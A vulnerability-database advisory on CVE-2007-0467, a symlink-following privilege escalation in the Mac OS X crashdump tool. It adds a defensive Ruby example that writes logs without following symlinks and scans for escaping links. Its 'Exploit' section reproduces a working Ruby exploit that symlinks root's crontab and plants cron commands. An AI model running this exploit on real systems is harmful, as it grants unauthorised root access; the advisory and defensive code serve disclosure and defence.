Apple Mac OS X crashdump Local Privilege Escalation Vulnerability

Vulnerability ID 1112117 Vulnerability type Unknown
Published 2007-01-29 Updated 2007-01-30
CVE ID CVE-2007-0467 CNNVD ID CNNVD-200701-530
Platform OSX CVSS score 6.2
|Sources
https://www.exploit-db.com/exploits/3219
https://www.securityfocus.com/bid/81985
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-530
|Details
Mac OS X is the operating system used on Apple's machines. The crashdump tool in Mac OS X has a vulnerability in how it handles log files, and a local attacker may exploit it to escalate privileges. crashreporterd is the daemon in Mac OS X responsible for detecting application crashes. When it detects an exception, it launches crashdump to investigate the cause of the crash and report it to the user. When reporting an exception, crashdump first attempts to write the report into the user's home directory (/Users/[user]/Library/Logs/CrashReporter/); if the home directory is unavailable, for example because permissions do not allow writing to it, it falls back to the system-wide log directory, /Library/Logs/CrashReporter/. However, crashdump follows symbolic links, and users in the admin group have write access to that directory. Because crashreporterd runs with root privileges, an attacker can plant a symbolic link in /Library/Logs/CrashReporter/ and cause arbitrary files to be modified.
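The defect described above is a privileged writer that follows symlinks in a directory other users can modify. The following Ruby is an added example (not part of the advisory or of Apple's code) of how such a writer should behave: it opens the log with O_NOFOLLOW, verifies on the opened descriptor that the file is a regular file owned by the expected uid, and includes a scan that flags symlinks whose target escapes the log directory. The directory, file names and symlink target are constructed in a temporary directory for the demo.

```ruby
require "tmpdir"

# Write a crash log without following symlinks. Returns :written on success,
# :rejected_symlink if the path is a symlink (open fails with ELOOP under
# File::NOFOLLOW). Other substitutions (hardlinks, foreign ownership) raise.
def write_crash_log_safely(dir, name, contents, expected_uid: Process.euid)
  path = File.join(dir, name)
  flags = File::WRONLY | File::CREAT | File::APPEND | File::NOFOLLOW
  File.open(path, flags, 0o600) do |f|
    st = f.stat # fstat on the descriptor we actually opened, not a re-lookup
    raise "refusing #{path}: not a regular file" unless st.file?
    raise "refusing #{path}: owned by uid #{st.uid}" unless st.uid == expected_uid
    f.write(contents)
  end
  :written
rescue Errno::ELOOP
  :rejected_symlink
end

# Detection: list entries in a shared log directory that are symlinks whose
# (lexically resolved) target lies outside that directory.
def escaping_symlinks(dir)
  root = File.expand_path(dir)
  Dir.children(dir).select do |entry|
    p = File.join(dir, entry)
    File.symlink?(p) &&
      !File.expand_path(File.readlink(p), dir).start_with?(root + "/")
  end
end

# Constructed scenario: an unprivileged user planted a symlink, named like a
# crash log, that points at a file outside the log directory (placeholder
# target, it does not need to exist for the check to trigger).
def demo
  Dir.mktmpdir("crashreporter") do |dir|
    File.symlink("/tmp/outside-placeholder-not-a-real-target",
                 File.join(dir, "vuln.crash.log"))
    {
      scan:     escaping_symlinks(dir),
      via_link: write_crash_log_safely(dir, "vuln.crash.log", "crash report\n"),
      fresh:    write_crash_log_safely(dir, "legit.crash.log", "crash report\n"),
    }
  end
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```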
|Exploit
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output 
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000  8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000  .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000   ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000  ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000  /usr/lib/dyld...
# 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45  ....4.......h..E
# 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20  ..X.......* * * 
# 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c  * * /tmp/x...dyl
# 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000  ib...........0..
#
# 4) Run the fake program which will crash and create /var/cron/tabs/root
# 5) Sleep and then create a legit crontab to refresh cron
SYMLINK_PATH  = "/Library/Logs/CrashReporter/vuln.crash.log"

PWNERCYCLE    = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};"    +
                "chmod 000 ~/Library/Logs/CrashReporter/;"      +
                "crontab /tmp/fakecron;"                        +
                "chmod +x /Users/Shared/r00t; sleep 61; ./vuln;"

def escalate()
  puts "++ Fixing up a fake crontab"
  fakecron = File.new("/tmp/fakecron", "w")
  fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n")
  fakecron.close
  tmp_ex = File.new("/Users/Shared/r00t", "w")
  tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n")
  tmp_ex.close

  system PWNERCYCLE
end

escalate()

# milw0rm.com [2007-01-29]
|Affected products
Apple Mac OS X 10.4.8
|References

Source: US-CERT
Name: TA07-072A
Link: http://www.us-cert.gov/cas/techalerts/TA07-072A.html
Source: US-CERT
Name: VU#363112
Link: http://www.kb.cert.org/vuls/id/363112
Source: XF
Name: macos-crashreporterd-privilege-escalation(31888)
Link: http://xforce.iss.net/xforce/xfdb/31888
Source: SECTRACK
Name: 1017751
Link: http://www.securitytracker.com/id?1017751
Source: VUPEN
Name: ADV-2007-0930
Link: http://www.frsirt.com/english/advisories/2007/0930
Source: SECUNIA
Name: 24479
Link: http://secunia.com/advisories/24479
Source: MISC
Link: http://projects.info-pull.com/moab/MOAB-28-01-2007.html
Source: docs.info.apple.com
Link: http://docs.info.apple.com/article.html?artnum=305214
Source: OSVDB
Name: 32706
Link: http://www.osvdb.org/32706
Source: APPLE
Name: APPLE-SA-2007-03-13
Link: http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html